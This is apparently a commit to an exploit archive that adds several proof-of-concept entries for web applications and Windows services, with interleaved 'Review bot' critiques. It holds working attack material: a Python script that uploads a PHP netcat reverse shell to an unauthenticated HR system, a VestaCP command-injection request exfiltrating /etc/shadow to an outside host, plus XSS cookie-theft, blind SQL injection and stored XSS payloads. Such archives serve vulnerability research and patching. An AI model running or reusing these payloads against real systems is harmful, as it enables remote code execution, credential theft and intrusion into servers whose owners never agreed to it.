+# Software Link: https://github.com/plone/Products.CMFPlone/tags
+# Version: 5.2.3
+# Tested on: Windows 10
+
+
+# Reference - https://github.com/plone/Products.CMFPlone/issues/3255
+
+Steps to reproduce the issue:
+1- Goto https://localhost/ where Plone 5.2.3 version is installed.
+2- Click on "Log in now" and Login as "Manager"
+3- Navigate to Manager=>Site Setup=>Site
+4- Edit "Site title" field to "xyz"
\ No newline at end of file
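Review bot: The reproduction steps stop at step 4 without stating the observed result, where the stored value is rendered, or which release fixes it. The value shown in step 4 (`"xyz"`) is not script content, so part of the line was presumably lost and the entry no longer demonstrates the issue named in the title. An `Observed:` line and a `Fixed in:` line taken from the referenced issue (`Products.CMFPlone/issues/3255`) would make the entry usable for triage. 49670.txt by the same author has the same gap (step 4 ends at `"1081px"` with no observed result or fixed version).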
diff --git a/exploits/multiple/webapps/49674.txt b/exploits/multiple/webapps/49674.txt
new file mode 100644
index 000000000..b12709b9f
--- /dev/null
+++ b/exploits/multiple/webapps/49674.txt
@@ -0,0 +1,26 @@
+# Title: VestaCP 0.9.8 - 'v_sftp_licence' Command Injection
+# Date: 17.03.2021
+# Author: Numan Türle
+# Vendor Homepage: https://vestacp.com
+# Software Link: https://myvestacp.com < 0.9.8-26-43
+# Software Link: https://vestacp.com < 0.9.8-26
+
+
+POST /edit/server/ HTTP/1.1
+Host: TARGET:8083
+Connection: close
+Content-Length: 6633
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+User-Agent: USER_AGENT
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4
+Cookie: PHPSESSID=HERE_COOKIE
+sec-gpc: 1
+
+token=149e2b8c201fd88654df6fd694158577&save=save&v_hostname=1338.example.com&v_timezone=Europe%2FIstanbul&v_language=en&v_mail_url=&v_mail_ssl_domain=&v_mysql_url=&v_mysql_password=&v_backup=yes&v_backup_gzip=5&v_backup_dir=%2Fbackup&v_backup_type=ftp&v_backup_host=&v_backup_username=&v_backup_password=&v_backup_bpath=&v_web_ssl_domain=&v_sys_ssl_crt=privatekeyblablabla&v_quota=no&v_firewall=no&v_sftp=yes&v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow&v_filemanager=no&v_filemanager_licence=&v_softaculous=yes&save=Save
+
+
+
+Parameter : v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow
\ No newline at end of file
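Review bot: The affected versions are carried in two `# Software Link:` lines (`< 0.9.8-26-43` and `< 0.9.8-26`), and there is no `# Version:` or `# Tested on:` field as the other entries in this commit have, so tooling that parses the header will not pick up the affected range. The entry also has no description: the raw request and the `Parameter :` line do not say what `v_sftp_licence` is passed to or what the effect is, which is what an administrator needs to judge impact. From the value shown, it looks as if extra arguments reach a download command; that should be confirmed and stated in a short `Desc:` paragraph together with the fixed release.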
diff --git a/exploits/php/webapps/49669.txt b/exploits/php/webapps/49669.txt
new file mode 100644
index 000000000..a6b0bb580
--- /dev/null
+++ b/exploits/php/webapps/49669.txt
@@ -0,0 +1,19 @@
+# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
+# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla
+# Date: 18 Mars 2021
+# Exploit Author: Clément Cruchet
+# Vendor Homepage: https://www.livezilla.net
+# Software Link: https://www.livezilla.net/downloads/en/
+# Version: LiveZilla Server 8.0.1.0 and before
+# Tested on: Windows/Linux
+# CVE : CVE-2019-12962
+
+GET /mobile/index.php HTTP/1.1
+Host: chat.website.com
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: ';alert(document.cookie)//
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
\ No newline at end of file
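Review bot: `# Date: 18 Mars 2021` does not follow the date format used elsewhere in this commit (for example `18-03-2021` or `2021-03-18`) and will not parse as an English month name. `# Version: LiveZilla Server 8.0.1.0 and before` gives the affected range but no fixed release, and the entry has no line saying where the `Accept-Language` value is reflected; both are needed to verify a patch against CVE-2019-12962.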
diff --git a/exploits/php/webapps/49670.txt b/exploits/php/webapps/49670.txt
new file mode 100644
index 000000000..d695ed8af
--- /dev/null
+++ b/exploits/php/webapps/49670.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Boonex Dolphin 7.4.2 - 'width' Stored XSS
+# Date: 18-03-2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.boonex.com/
+# Software Link: https://www.boonex.com/downloads
+# Version: 7.4.2
+# Tested on: Windows 10
+
+# Reference - https://github.com/xoffense/POC/blob/main/Boonex%20Dolphin%20CMS%207.4.2%20%20stored%20XSS
+
+Steps to Reproduce Bug:
+1- Login to Admin Panel
+2- Goto "Builders" => "Pages Builder"
+3- Select any page
+4- Turn on Burp Suite Intercept and Change "other pages width" to "1081px"
\ No newline at end of file
diff --git a/exploits/php/webapps/49672.py b/exploits/php/webapps/49672.py
new file mode 100755
index 000000000..365594c36
--- /dev/null
+++ b/exploits/php/webapps/49672.py
@@ -0,0 +1,64 @@
+# Exploit Title: Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated)
+# Date: 19-03-2021
+# Exploit Author: Christian Vierschilling
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/11222/profiling-system-human-resource-management.html
+# Software Download: https://www.sourcecodester.com/download-code?nid=11222&title=Profiling+System+For+Human+Resource+Management+using+PHP%2FPDO+with+Source+Code
+# Version: 1.0
+# Tested on: PHP 7.4.14, Linux x64_x86
+
+# --- Description --- #
+
+# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.
+
+# --- Proof of concept --- #
+
+#!/usr/bin/python3
+import random
+import sys
+import requests
+from requests_toolbelt.multipart.encoder import MultipartEncoder
+
+def file_upload(target_ip, attacker_ip, attacker_port):
+ random_number = str(random.randint(100000000,999999999))
+ file_name = random_number + "shell.php"
+ revshell_string = '&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port)
+ m = MultipartEncoder(fields={'upload': '', 'per_file': (file_name, revshell_string, 'application/x-php')})
+ print("(+) Uploading php reverse shell file ..")
+ r1 = requests.post('http://{}/ProfilingSystem/add_file_query.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type})
+ if not "Sorry, there was an error uploading your file." in r1.text:
+ print("(+) File uploaded to: http://{}/ProfilingSystem/uploads/{}".format(target_ip,file_name))
+ return file_name
+ else:
+ print("(-) Oh noes, error occured while uploading the file.. quitting!")
+ exit()
+
+def trigger_shell(target_ip, target_file_name):
+ url = 'http://{}/ProfilingSystem/uploads/{}'.format(target_ip, target_file_name)
+ print("(+) Now trying to trigger our shell..")
+ r2 = requests.get(url)
+ if r2.status_code != 200:
+ print("(-) Oh noes, we can't reach the uploaded file.. did it upload correctly?! Quitting!")
+ exit()
+ else:
+ return None
+
+def main():
+ if len(sys.argv) != 4:
+ print('(+) usage: %s ' % sys.argv[0])
+ print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0])
+ sys.exit(-1)
+
+ print("--- Exploiting today: Profiling System for Human Resource Management 1.0 ---")
+ print("----------------------------------------------------------------------------")
+ target_ip = sys.argv[1]
+ attacker_ip = sys.argv[2]
+ attacker_port = sys.argv[3]
+
+ target_file_name = file_upload(target_ip, attacker_ip, attacker_port)
+ trigger_shell(target_ip, target_file_name)
+
+ print("(+) done!")
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
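Review bot: The `#!/usr/bin/python3` line sits below the comment header rather than on line 1, so it has no effect even though the file is added with mode 100755. The description is a single sentence and does not name the root cause that the script makes visible: `add_file_query.php` accepts a `.php` file in the `per_file` field without authentication and the file is then served from `/ProfilingSystem/uploads/`. Adding that, together with the fix direction (require a session, allow-list extensions, store uploads outside the web root or in a directory where scripts are not executed), would make the entry actionable for a maintainer. Both functions also call the interactive `exit()` helper although `sys` is imported and `main()` already uses `sys.exit`.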
diff --git a/exploits/php/webapps/49687.txt b/exploits/php/webapps/49687.txt
new file mode 100644
index 000000000..a2c1ad4dc
--- /dev/null
+++ b/exploits/php/webapps/49687.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Online News Portal 1.0 - 'name' SQL Injection
+# Exploit Author: Richard Jones
+# Date: 2021-03-18
+# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
+# Version: 1.0
+# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
+
+# Steps
+# Add a new product: http://127.0.0.1/pos_inv/supplier/addproduct.php
+# Save request in BurpSuite
+# Run saved request with sqlmap -r sql.txt
+
+
+---
+Parameter: MULTIPART name ((custom) POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: -----------------------------15280280330873390203691218429
+Content-Disposition: form-data; name="name"
+
+aasd' AND (SELECT 1775 FROM (SELECT(SLEEP(5)))Jpba) AND 'EaFY'='EaFY
+-----------------------------15280280330873390203691218429
+Content-Disposition: form-data; name="category"
+
+1
+-----------------------------15280280330873390203691218429
+Content-Disposition: form-data; name="price"
+
+asd
+-----------------------------15280280330873390203691218429
+Content-Disposition: form-data; name="qty"
+
+asd
+-----------------------------15280280330873390203691218429
+Content-Disposition: form-data; name="image"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------15280280330873390203691218429--
+---
\ No newline at end of file
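Review bot: The title names Online News Portal 1.0, but the only URL in the steps is `http://127.0.0.1/pos_inv/supplier/addproduct.php`, a path that reads like a different (inventory / point-of-sale) application, so a reader cannot tell which product the finding applies to; 49688.txt in this commit shows the same mismatch in its `/pos_inv/admin/` requests. The header should be reconciled with the application that was actually tested, or a line added such as `# Note: the tested install serves the application under /pos_inv/`. The steps also do not say whether the supplier page needs a login, which presumably it does and which changes the severity. A closing line such as `# Fix: bind 'name' and the other form fields through a prepared statement instead of concatenating them into the query` would let defenders act on the report.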
diff --git a/exploits/php/webapps/49688.txt b/exploits/php/webapps/49688.txt
new file mode 100644
index 000000000..6bb76d5af
--- /dev/null
+++ b/exploits/php/webapps/49688.txt
@@ -0,0 +1,115 @@
+# Exploit Title: Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting
+# Exploit Author: Richard Jones
+# Date: 2021-03-18
+# Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download
+# Version: 1.0
+# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
+
+# Multipul endpoints on the application suffer from Stored XSS injection as a user/supplier and admin. Scripts execute on page load.
+
+# One
+POST /pos_inv/admin/addcustomer.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------26863080316712198253766739741
+Content-Length: 661
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/pos_inv/admin/customer.php
+Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
+Upgrade-Insecure-Requests: 1
+
+-----------------------------26863080316712198253766739741
+Content-Disposition: form-data; name="name"
+
+
+-----------------------------26863080316712198253766739741
+Content-Disposition: form-data; name="address"
+
+
+-----------------------------26863080316712198253766739741
+Content-Disposition: form-data; name="contact"
+
+
+-----------------------------26863080316712198253766739741
+Content-Disposition: form-data; name="username"
+
+
+-----------------------------26863080316712198253766739741
+Content-Disposition: form-data; name="password"
+
+
+-----------------------------26863080316712198253766739741--
+
+
+
+
+# Two
+http://127.0.0.1/pos_inv/admin/supplier.php
+
+POST /pos_inv/admin/edit_supplier.php?id=4 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 176
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/pos_inv/admin/supplier.php
+Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
+Upgrade-Insecure-Requests: 1
+
+name=Dell+Computer+Corporation&address=%3Cscript%3Ealert%28%60Stored+XSS%60%29%3C%2Fscript%3E&contact=1-800-WWW-DELL&username=supplier&password=fa3ddb86f38fb6a8284636249f6551aa
+
+
+
+
+# Three
+http://127.0.0.1/pos_inv/admin/product.php
+
+POST /pos_inv/admin/edit_product.php?id=12 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------11435260685310908573266876009
+Content-Length: 844
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/pos_inv/admin/product.php
+Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm
+Upgrade-Insecure-Requests: 1
+
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="name"
+
+ACER Aspire GX-781 Gaming PC
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="category"
+
+2
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="supplier"
+
+0
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="price"
+
+749.99
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="qty"
+
+1000
+-----------------------------11435260685310908573266876009
+Content-Disposition: form-data; name="image"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------11435260685310908573266876009--
\ No newline at end of file
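Review bot: All three captured requests publish a session identifier in the `Cookie: PHPSESSID=…` header, and request Two also posts what looks like a password hash in `password=…`; both should be replaced with placeholders such as `PHPSESSID=<session-id>` before the file is published. As rendered here, the form fields in requests One and Three are empty or hold ordinary values, so only request Two (the `address` field) documents which parameter is affected; a comment above each request naming the affected fields would fix that. The header comment has a typo (`Multipul`). A remediation line such as `# Fix: HTML-encode stored values on output (e.g. htmlspecialchars) in the customer, supplier and product pages` is missing.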
diff --git a/exploits/windows/local/49671.txt b/exploits/windows/local/49671.txt
new file mode 100644
index 000000000..cdf015bec
--- /dev/null
+++ b/exploits/windows/local/49671.txt
@@ -0,0 +1,36 @@
+# Exploit Title: BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path
+# Date: 2021-03-17
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://global.brother/
+# Software Link: https://support.brother.com/g/b/downloadend.aspx?c=us&lang=en&prod=hls7000dn_us_eu_as&os=10013&dlid=dlf005042_000&flang=4&type3=26
+# Version: 3.75.0000
+# Tested on: Windows 10
+# Source: https://docs.unsafe-inline.com/0day/bradmin-professional-3.75-unquoted-service-path
+
+#Description:
+
+This software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices.
+If a user can insert a executable which is called as "BRAdmin" under the "C:\Program Files (x86)\Brother\" , local system privileges could be obtained by the user.
+
+#Detection of unquoted service path:
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """
+Brother BRAdminPro Scheduler
+BRA_Scheduler
+C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
+Auto
+
+
+C:\>sc qc BRA_Scheduler
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: BRA_Scheduler
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Brother BRAdminPro Scheduler
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
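Review bot: The description makes the privilege escalation conditional on a user being able to place a file under `C:\Program Files (x86)\Brother\`, but the write-up never shows whether a non-administrative user has write access there; on a default Windows install that tree is normally writable only by administrators, and that decides the real severity. Adding the directory ACL (for example the output of `icacls "C:\Program Files (x86)\Brother"`) next to the `sc qc` output would settle it. 49673.txt (mosquitto) has the same gap, and in its path the only component containing a space is `Program Files`, so its precondition concerns an even more tightly protected location. Both files would benefit from a remediation line such as `# Fix: enclose the service binary path in double quotes in the service's ImagePath value`.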
diff --git a/exploits/windows/local/49673.txt b/exploits/windows/local/49673.txt
new file mode 100644
index 000000000..c51d234d7
--- /dev/null
+++ b/exploits/windows/local/49673.txt
@@ -0,0 +1,33 @@
+# Exploit Title: Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path
+# Discovery by: Riadh Bouchahoua
+# Discovery Date: 19-03-2021
+# Vendor Homepage: https://mosquitto.org/
+# Software Links : https://mosquitto.org/download/
+# Tested Version: 2.0.9
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 64 bits
+
+# Step to discover Unquoted Service Path:
+
+
+
+====
+
+C:\Users\Admin>wmic service get name,pathname,startmode |findstr /i /v "C:\Windows\\" |findstr "mosquitto"
+mosquitto C:\Program Files\mosquitto\mosquitto.exe run
+
+====
+
+C:\Users\Admin>sc qc mosquitto
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: mosquitto
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\mosquitto\mosquitto.exe run
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Mosquitto Broker
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49678.txt b/exploits/windows/local/49678.txt
new file mode 100644
index 000000000..a24ce64e8
--- /dev/null
+++ b/exploits/windows/local/49678.txt
@@ -0,0 +1,48 @@
+# Exploit Title: SOYAL 701 Server 9.0.1 - Insecure Permissions
+# Date: 25.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
+
+Vendor: SOYAL Technology Co., Ltd
+Product web page: https://www.soyal.com.tw | https://www.soyal.com
+Affected version: 9.0.1 190322
+ 8.0.6 181227
+
+Summary: 701 Server is the program used to set up and configure LAN
+and IP based access control systems, from the COM port used to the
+quantity and type of controllers connected. It is also used for
+programming some of the more complex controllers such as the AR-716E
+and the AR-829E.
+
+Desc: The application suffers from an elevation of privileges vulnerability
+which can be used by a simple authenticated user that can change the
+executable file with a binary of choice. The vulnerability exist due
+to the improper permissions, with the 'F' flag (Full) for 'Everyone'
+and 'Authenticated Users' group.
+
+Tested on: Microsoft Windows 10 Enterprise
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5633
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5633.php
+
+
+25.01.2021
+
+--
+
+
+C:\Program Files (x86)\701Server>cacls McuServer.exe
+C:\Program Files (x86)\701Server\McuServer.exe Everyone:F
+ NT AUTHORITY\Authenticated Users:(ID)F
+ NT AUTHORITY\SYSTEM:(ID)F
+ BUILTIN\Administrators:(ID)F
+ BUILTIN\Users:(ID)R
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
+
+C:\Program Files (x86)\701Server>
\ No newline at end of file
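Review bot: The `cacls` listing distinguishes an explicit entry (`Everyone:F`) from entries marked `(ID)`, which cacls uses for inherited ACEs, yet the description treats the 'Everyone' and 'Authenticated Users' grants alike; if `Authenticated Users:(ID)F` is inherited, the install directory itself carries the weak ACL and should be shown and named as affected. 49679.txt has the same gap for `C:\Program Files (x86)\701Client`. Neither advisory states a fix; a line such as `Fix: remove the Full (F) grant for Everyone / Authenticated Users on the install directory and its files, leaving write access to Administrators and SYSTEM` would make the finding actionable. Since `cacls` is deprecated, the `icacls` output would be the better evidence to record.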
diff --git a/exploits/windows/local/49679.txt b/exploits/windows/local/49679.txt
new file mode 100644
index 000000000..be7cd51f8
--- /dev/null
+++ b/exploits/windows/local/49679.txt
@@ -0,0 +1,48 @@
+# Exploit Title: SOYAL 701 Client 9.0.1 - Insecure Permissions
+# Date: 25.01.2021
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com
+
+Vendor: SOYAL Technology Co., Ltd
+Product web page: https://www.soyal.com.tw | https://www.soyal.com
+Affected version: 9.0.1 190410
+ 9.0.1 190115
+
+Summary: 701 Client is the user interface software for the access control
+system. It is used for adding and deleting tokens, setting door groups
+for access, setting time zones for limiting access and monitoring ingress
+and egress on a live system, among other things.
+
+Desc: The application suffers from an elevation of privileges vulnerability
+which can be used by a simple authenticated user that can change the
+executable file with a binary of choice. The vulnerability exist due
+to the improper permissions, with the 'F' flag (Full) for 'Authenticated Users'
+group.
+
+Tested on: Microsoft Windows 10 Enterprise
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5634
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5634.php
+
+
+25.01.2021
+
+--
+
+
+C:\Program Files (x86)\701Client>cacls client.exe
+C:\Program Files (x86)\701Client\client.exe NT AUTHORITY\Authenticated Users:F
+ NT AUTHORITY\Authenticated Users:(ID)F
+ NT AUTHORITY\SYSTEM:(ID)F
+ BUILTIN\Administrators:(ID)F
+ BUILTIN\Users:(ID)R
+ APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
+ APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
+
+
+C:\Program Files (x86)\701Client>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ed5498318..06042909a 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6774,6 +6774,7 @@ id,file,description,date,author,type,platform,port
49567,exploits/windows/dos/49567.txt,"AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
49568,exploits/windows/dos/49568.txt,"Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)",2021-02-16,"Ismael Nava",dos,windows,
49638,exploits/windows/dos/49638.py,"Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)",2021-03-11,"Enes Özeser",dos,windows,
+49685,exploits/hardware/dos/49685.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)",2021-03-19,LiquidWorm,dos,hardware,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11292,6 +11293,10 @@ id,file,description,date,author,type,platform,port
49656,exploits/android/local/49656.py,"GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,android,
49660,exploits/windows/local/49660.py,"FastStone Image Viewer 7.5 - .cur BITMAPINFOHEADER 'BitCount' Stack Based Buffer Overflow (ASLR & DEP Bypass)",2021-03-17,"Paolo Stagno",local,windows,
49661,exploits/windows/local/49661.txt,"VFS for Git 1.0.21014.1 - 'GVFS.Service' Unquoted Service Path",2021-03-18,"Mohammed Alshehri",local,windows,
+49671,exploits/windows/local/49671.txt,"BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path",2021-03-19,"Metin Yunus Kandemir",local,windows,
+49673,exploits/windows/local/49673.txt,"Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path",2021-03-19,"Riadh Bouchahoua",local,windows,
+49678,exploits/windows/local/49678.txt,"SOYAL 701 Server 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,
+49679,exploits/windows/local/49679.txt,"SOYAL 701 Client 9.0.1 - Insecure Permissions",2021-03-19,LiquidWorm,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18413,6 +18418,7 @@ id,file,description,date,author,type,platform,port
49621,exploits/java/remote/49621.java,"CatDV 9.2 - RMI Authentication Bypass",2021-03-05,"Christopher Ellis",remote,java,
49629,exploits/windows/remote/49629.py,"Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)",2021-03-09,1F98D,remote,windows,
49663,exploits/windows/remote/49663.py,"Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)",2021-03-14,F5,remote,windows,
+49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",2021-03-19,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43850,4 +43856,18 @@ id,file,description,date,author,type,platform,port
49662,exploits/multiple/webapps/49662.txt,"VestaCP 0.9.8 - 'v_interface' Add IP Stored XSS",2021-03-18,"numan türle",webapps,multiple,
49666,exploits/php/webapps/49666.txt,"SEO Panel 4.8.0 - 'order_col' Blind SQL Injection",2021-03-18,"Piyush Patil",webapps,php,
49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php,
+49668,exploits/multiple/webapps/49668.txt,"Plone CMS 5.2.3 - 'Title' Stored XSS",2021-03-19,"Piyush Patil",webapps,multiple,
+49669,exploits/php/webapps/49669.txt,"LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS",2021-03-19,"Clément Cruchet",webapps,php,
+49670,exploits/php/webapps/49670.txt,"Boonex Dolphin 7.4.2 - 'width' Stored XSS",2021-03-19,"Piyush Patil",webapps,php,
+49672,exploits/php/webapps/49672.py,"Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated)",2021-03-19,"Christian Vierschilling",webapps,php,
+49674,exploits/multiple/webapps/49674.txt,"VestaCP 0.9.8 - 'v_sftp_licence' Command Injection",2021-03-19,"numan türle",webapps,multiple,
+49676,exploits/hardware/webapps/49676.txt,"SOYAL Biometric Access Control System 5.0 - Master Code Disclosure",2021-03-19,LiquidWorm,webapps,hardware,
+49677,exploits/hardware/webapps/49677.html,"SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF",2021-03-19,LiquidWorm,webapps,hardware,
+49680,exploits/hardware/webapps/49680.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)",2021-03-19,LiquidWorm,webapps,hardware,
+49681,exploits/hardware/webapps/49681.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass",2021-03-19,LiquidWorm,webapps,hardware,
+49683,exploits/hardware/webapps/49683.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution",2021-03-19,LiquidWorm,webapps,hardware,
+49684,exploits/hardware/webapps/49684.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)",2021-03-19,LiquidWorm,webapps,hardware,
+49686,exploits/hardware/webapps/49686.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)",2021-03-19,LiquidWorm,webapps,hardware,
+49687,exploits/php/webapps/49687.txt,"Online News Portal 1.0 - 'name' SQL Injection",2021-03-19,"Richard Jones",webapps,php,
